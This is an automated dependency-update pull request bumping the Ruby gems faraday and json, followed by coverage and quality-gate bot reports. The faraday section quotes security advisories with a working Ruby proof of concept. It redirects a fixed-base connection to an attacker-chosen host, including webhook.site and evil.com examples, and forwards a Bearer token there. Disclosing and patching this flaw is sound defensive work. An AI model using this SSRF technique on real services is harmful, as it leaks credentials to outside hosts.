🚨 [security] Update faraday 2.14.0 → 2.14.2 (patch)

[depfu]

---

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

---

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

✳️ faraday (2.14.0 → 2.14.2) · Repo · Changelog

Security Advisories 🚨

🚨 Faraday has a possible incomplete fix for GHSA-33mh-2634-fwr2: protocol-relative URI objects still bypass host scoping

Summary

Faraday::Connection#build_exclusive_url still allows protocol-relative host override when the request target is provided as a URI object instead of a String. This bypasses the February 2026 fix for GHSA-33mh-2634-fwr2 and can redirect a request built from a fixed-base Faraday::Connection to an attacker-controlled host while preserving connection-scoped headers such as Authorization.

Affected Component

• Repository File(s)/Endpoint(s):
  • lib/faraday/connection.rb
  • lib/faraday/request.rb
  • spec/faraday/connection_spec.rb
  • spec/faraday/request_spec.rb
• Function(s):
  • Faraday::Connection#build_exclusive_url
  • Faraday::Connection#run_request
  • Faraday::Request#url
  • Faraday::Request#to_env
• Version(s) Tested:
  • Faraday 2.14.1
  • repository HEAD a01039c948d3e9e41e03d152aed7244f0fb4d5ca

Attacker Profile

• Who: A remote user who can influence a per-request target/path in an application that uses a fixed-base Faraday connection
• Access Required: Ability to supply data that the application converts to URI.parse(...) and passes to conn.get(...), [conn.post](http://conn.post/)(...), or req.url(...)
• Capability: Control over a protocol-relative URI such as URI("//evil.example/pwn")

Steps to Reproduce

1. Use the current repository checkout and load Faraday from lib/.
2. Build a fixed-base connection and provide a protocol-relative URI object to req.url.
3. Observe that the request is actually sent to the attacker-controlled host instead of the configured base host.
4. Observe that the connection-scoped Authorization header remains attached to the off-host request.

Verification Evidence

• Environment: macOS, Ruby from local environment, Faraday 2.14.1, faraday-net_http, local WEBrick listener on 127.0.0.1:4567, HEAD a01039c948d3e9e41e03d152aed7244f0fb4d5ca
• Commands executed:

$ ruby -e 'require "webrick"; server = WEBrick::HTTPServer.new(Port: 4567, BindAddress: "127.0.0.1", AccessLog: [], Logger: WEBrick::Log.new($stderr, WEBrick::Log::WARN)); server.mount_proc("/") { |req, res| res.status = 200; res.body = "host=#{req.host}\nauth=#{req["Authorization"]}\npath=#{req.path}\n" }; trap("INT") { server.shutdown }; server.start'
$ ruby -Ilib -e 'require "faraday"; require "faraday/net_http"; conn = Faraday.new(url: "http://trusted.example/base", headers: {"Authorization" => "Bearer secret-token"}) { |f| f.adapter :net_http }; target = ["//127.0.0.1:4567", "/pwn"].join; resp = conn.get(URI(target)); puts resp.status; puts resp.body'

• PoC code (inline):

require "faraday"
require "faraday/net_http"
conn = Faraday.new(url: "http://trusted.example/base", headers: {

"Authorization" => "Bearer secret-token"

}) { |f| f.adapter :net_http }
target = ["//127.0.0.1:4567", "/pwn"].join

resp = conn.get(URI(target))
puts resp.status

puts resp.body

• Exit code: 0
• stdout (relevant excerpt):

200
host=127.0.0.1
auth=Bearer secret-token
path=/pwn

• stderr (relevant excerpt):

N/A

• Artifacts: none

Additional External Confirmation

The issue was also independently reproduced against a public HTTP collector on Faraday 2.14.1 using the default net_http adapter:

require "faraday"
require "faraday/net_http"
conn = Faraday.new(

url: "http://trusted.example/base",

headers: { "Authorization" => "Bearer secret-token" }

) { |f| f.adapter :net_http }
target = ["//webhook.site", "/<collector-id>"].join

resp = conn.get(URI(target))

resp.status

# => 200

resp.url.host

# => "webhook.site"

This external confirmation shows the request is not only misbuilt in memory, but is actually dispatched off-host by a real adapter under normal usage.

Supporting Materials

• Existing advisory for the original string-based issue: GHSA-33mh-2634-fwr2
• Existing CVE for the original string-based issue: CVE-2026-25765
• Existing regression tests for the string-only fix:
  • spec/faraday/connection_spec.rb:314-345
• Existing test proving supported URI request input:
  • spec/faraday/request_spec.rb:26-31

Impact

The direct consequence is off-host request forgery from code paths that believe they are constrained to a fixed base URL. If the
connection carries default headers or query parameters, those values are forwarded to the attacker-selected host.

🚨 Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:

conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

• Reject or strip input that starts with // followed by a non-/ character
• Use an allowlist of permitted path prefixes
• Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:

def safe_path(user_input)
  raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
  user_input
end

Release Notes

2.14.2

Security Note

This release contains a security fix, we recommend all users to upgrade as soon as possible.
A Security Advisory with more details will be posted shortly.

What's Changed

• Add Ruby 4 to CI by @larouxn in #1659
• Modernize RuboCop configuration and fix offenses by @larouxn in #1660
• Lint: Style/OneClassPerFile by @olleolleolle in #1668
• fix(docs): fix incorrect link label by @JohnnyKei in #1667
• chore: Upgrade package.json packages using audit fix by @olleolleolle in #1669

New Contributors

• @larouxn made their first contribution in #1659
• @JohnnyKei made their first contribution in #1667

Full Changelog: v2.14.1...v2.14.2

2.14.1

Security Note

This release contains a security fix, we recommend all users to upgrade as soon as possible.
A Security Advisory with more details will be posted shortly.

What's Changed

• Add comprehensive AI agent guidelines for Claude, Cursor, and GitHub Copilot by @Copilot in #1642
• Add RFC document for Options architecture refactoring plan by @Copilot in #1644
• Bump actions/checkout from 5 to 6 by @dependabot[bot] in #1655
• Explicit top-level namespace reference by @c960657 in #1657

New Contributors

• @Copilot made their first contribution in #1642

Full Changelog: v2.14.0...v2.14.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 17 commits:

• Update version.rb
• Merge commit from fork
• Upgrade package.json packages using audit fix (#1669)
• Create SECURITY.md
• fix(docs): fix incorrect link label in request-options and remove dead link in url-encoding (#1667)
• Lint: Style/OneClassPerFile (#1668)
• Modernize RuboCop configuration and fix offenses (#1660)
• Add Ruby 4 to CI (#1659)
• Version bump to 2.14.1
• Merge commit from fork
• Explicit top-level namespace reference (#1657)
• Bump actions/checkout from 5 to 6 (#1655)
• Ensure Claude reads the guidelines and allow to plan in a gitignored .ai/PLAN.md doc
• Add RFC document for Options architecture refactoring plan (#1644)
• Add comprehensive AI agent guidelines for Claude, Cursor, and GitHub Copilot (#1642)
• Update Faraday-specific AI agent guidelines
• Add AI agent guidelines specific to Faraday repository

↗️ json (indirect, 2.18.0 → 2.19.5) · Repo · Changelog

Security Advisories 🚨

🚨 Ruby JSON has a format string injection vulnerability

Impact

A format string injection vulnerability than that lead to denial of service attacks or information disclosure, when the allow_duplicate_key: false parsing option is used to parse user supplied documents.

This option isn't the default, if you didn't opt-in to use it, you are not impacted.

Patches

Patched in 2.19.2.

Workarounds

The issue can be avoided by not using the allow_duplicate_key: false parsing option.

Release Notes

2.19.5

What's Changed

• Cap the parser to emit a maximum of 5 deprecation warnings per document. Emitting more is not helpful.

Full Changelog: v2.19.4...v2.19.5

2.19.4

What's Changed

• Fix parsing of out of range floats (very large exponents that lead to either 0.0 or Inf).

Full Changelog: v2.19.2...v2.19.4

2.19.3

• Fix handling of unescaped control characters preceeded by a backslash.

Full Changelog: v2.19.2...v2.19.3

2.19.2

What's Changed

• Fix a format string injection vulnerability in JSON.parse(doc, allow_duplicate_key: false). CVE-2026-33210

Full Changelog: v2.19.1...v2.19.2

2.19.1

What's Changed

• Fix a compiler dependent GC bug introduced in 2.18.0.

Full Changelog: v2.19.0...v2.19.1

2.19.0

What's Changed

• Fix allow_blank parsing option to no longer allow invalid types (e.g. load([], allow_blank: true) now raise a type error).
• Add allow_invalid_escape parsing option to ignore backslashes that aren't followed by one of the valid escape characters.

Full Changelog: v2.18.1...v2.19.0

2.18.1

What's Changed

• Fix a potential crash in very specific circumstance if GC triggers during a call to to_json
  without first invoking a user defined #to_json method.

Full Changelog: v2.18.0...v2.18.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 69 commits:

• Release 2.19.5
• Avoid spamming too many deprecations while parsing
• Test TruffleRuby release in CI for improved stability
• Force ensure_valid_encoding to be inlined.
• Use RB_ENC_CODERANGE to first check the cached coderange before calling rb_enc_str_coderange if the coderange is unknown.
• Fix typo in changelog
• Release 2.19.4
• Fix references to NAN and INFINITY in documentation comments
• Reduce warnings
• Fix parsing of *negative* out of bound floats.
• Fix handling out of of range exponent in numbers
• Fix json generation for symbols on TruffleRuby
• Keep Integer#to_json optimized and adapt the test
• Avoid extra String#+@ calls, interpolated strings are already mutable
• Avoid method redefinition warnings in test_broken_bignum
• test_broken_bignum: avoid fork and subprocess for robustness
• Generate non-frozen strings on TruffleRuby for consistency
• Remove some dead scripts and configs
• Remove outdated README-json-jruby.md
• Release 2.19.3
• Fix handling of unescaped control characters preceeded by a backslash
• parser.c: handle eagerly freed rstack in rvalue_stack_mark
• Use embeddable types
• Run CI against ruby-head-debug
• Revert use of RUBY_TYPED_EMBEDDABLE
• Fix Ruby 4.1.0dev compatibility
• Use embeddable types
• Reduce an unnecessary intermediate string
• Remove unreachable code
• Add security backports in the changelog
• Release 2.19.2
• Fix a format string injection vulnerability
• Merge pull request #953 from ruby/dependabot/github_actions/actions/create-github-app-token-3
• Bump actions/create-github-app-token from 2 to 3
• Release 2.19.1
• Add missing GC_GUARD in `fbuffer_append_str`
• Release 2.19.0
• fbuffer.h: Use size_t over unsigned long
• Add depth validation to Jruby and TruffleRuby implementations
• Reject negative depth; add overflow guards to prevent hang/crash
• Fix `allow_blank` parsing option to only consider strings.
• Reimplement `to_json` methods in Ruby
• Remove unused load_uint8x16_4 function.
• Use single quotes for allow_invalid_escape doc
• Add `allow_invalid_escape` parsing option
• Remove bignum warnings
• Remove unused method in JSONGeneratorTest
• [DOC] Another link fix
• [DOC] Fix links
• Stop using RB_ALLOCV
• Cleanup function delecarations
• Remove codepaths under !RUBY_INTEGER_UNIFICATION
• Release 2.18.1
• fbuffer_append_str: assume string
• Ensure `Generator::State` is kept on the stack
• Improve class JSON intro
• Extract json_fast_memcpy16 for readability
• Use __builtin_memcpy, if available, to copy overlapping byte ranges in copy_remaining_bytes to avoid a branch to MEMCPY. Additionally use a space as padding byte instead of an 'X' so it can be represented diretly on AArch64 with a single instruction.
• Remove trailing spaces [ci skip]
• initialize search.chunk_end to silence a warning about it being potentially uninitialized
• use a conditional to select SIMD implementation rather than pointer
• Directly write to the output buffer when converting UTF32 to UTF8.
• Merge pull request #921 from nobu/nonportable-code
• Fix non-portable code
• Simplify unescape_unicode
• Keep track of the the number of additional backslashes to avoid an extra memchr searching the remaining characters when no more backslashes exist.
• Add missing documentation for `allow_control_characters` parsing option
• Update `fpconv_dtoa` definition to use `dest[32]`
• Revert "Skip test failing with JRuby in CI"

---

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands

@​depfu rebase

Rebases against your default branch and redoes this update

@​depfu recreate

Recreates this PR, overwriting any edits that you've made to it

@​depfu merge

Merges this PR once your tests are passing and conflicts are resolved

@​depfu cancel merge

Cancels automatic merging of this PR

@​depfu close

Closes this PR and deletes the branch

@​depfu reopen

Restores the branch and reopens this PR (if it's closed)

@​depfu pause

Ignores all future updates for this dependency and closes this PR

@​depfu pause [minor|major]

Ignores all future minor/major updates for this dependency and closes this PR

@​depfu resume

Future versions of this dependency will create PRs again (leaves this PR as is)

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 100.00%. Comparing base (4763359) to head (983d9b7).

Additional details and impacted files

@@            Coverage Diff            @@
##              main       #85   +/-   ##
=========================================
  Coverage   100.00%   100.00%           
=========================================
  Files           16        16           
  Lines          362       362           
=========================================
  Hits           362       362           

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud